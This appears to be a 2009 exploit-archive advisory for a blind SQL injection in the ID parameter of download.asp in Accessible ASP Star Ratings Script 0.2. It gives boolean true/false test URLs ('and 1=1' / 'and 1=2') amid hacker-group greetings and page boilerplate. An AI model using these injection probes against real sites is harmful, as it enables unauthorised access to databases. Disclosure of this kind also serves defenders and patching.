Accessible ASP Star Ratings Script 0.2 blind SQL injection

2009.12.21

Credit: R3d-d3v!L

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

[?] ?????????????????????????{In The Name Of Allah The Mercifull}??????????????????????
[?]
[~] Tybe: (download.asp ID) BL!ND SQL Injection Vulnerability
[?]
[~] Vendor:www.chrishardy.co.uk
[?]
[?] Software:Accessible ASP Star Ratings Script Version 0.2
[? ]Price : FREE (One-time fee)
[?] author: ((R3d-d3v!L))
[?]
[?] Date: 16.d3c.2009
[?]T!ME: 11:25 pm
[?] Home: WwW.Xp10.ME
[?]
[?] contact: X@hotmail.co.jp
[?]??????????????????????{DEV!L'5 of SYST3M}??????????????????
[?] Exploit:
[?] TrUE : download.asp?ID=698123+and+1=1
[?] FALSE : download.asp?ID=698123+and+1=2
[?]LivE 4 d3m0:
[?]www.site.com/scripts/download.asp?ID=>>BL!ND<<
N073:
uSE y0UR M!ND 70 MAKE MORE THAN ATTACK!NG ;)
[~]-----------------------------{D3V!L5 0F 7h3 SYS73M!?!}-----------------------------------------------------
[~] Greetz tO: dolly & L!TTLE 547r & 0r45hy & DEV!L_MODY & po!S!ON Sc0rp!0N & mAG0ush_1987
[~]70 &#1616;ALL ARAB!AN HACKER 3X3PT : LAM3RZ
[~] spechial thanks : ab0 mohammed & XP_10 h4CK3R & JASM!N & c0prA & MARWA & N0RHAN & S4R4
[?]spechial SupP0RT: MY M!ND ;) & dookie2000ca & ((OFFsec))
[?]4r48!4n.!nforma7!0N.53cur!7y ---> ((r3d D3v!L))--M2Z--DEV!L_Ro07--JUPA
[~]spechial FR!ND: 74M3M
[~] !'M 4R48!4N 3XPL0!73R.
[~]{[(D!R 4ll 0R D!E)]};
[~]--------------------------------------------------------------------------------

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Accessible ASP Star Ratings Script 0.2 blind SQL injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.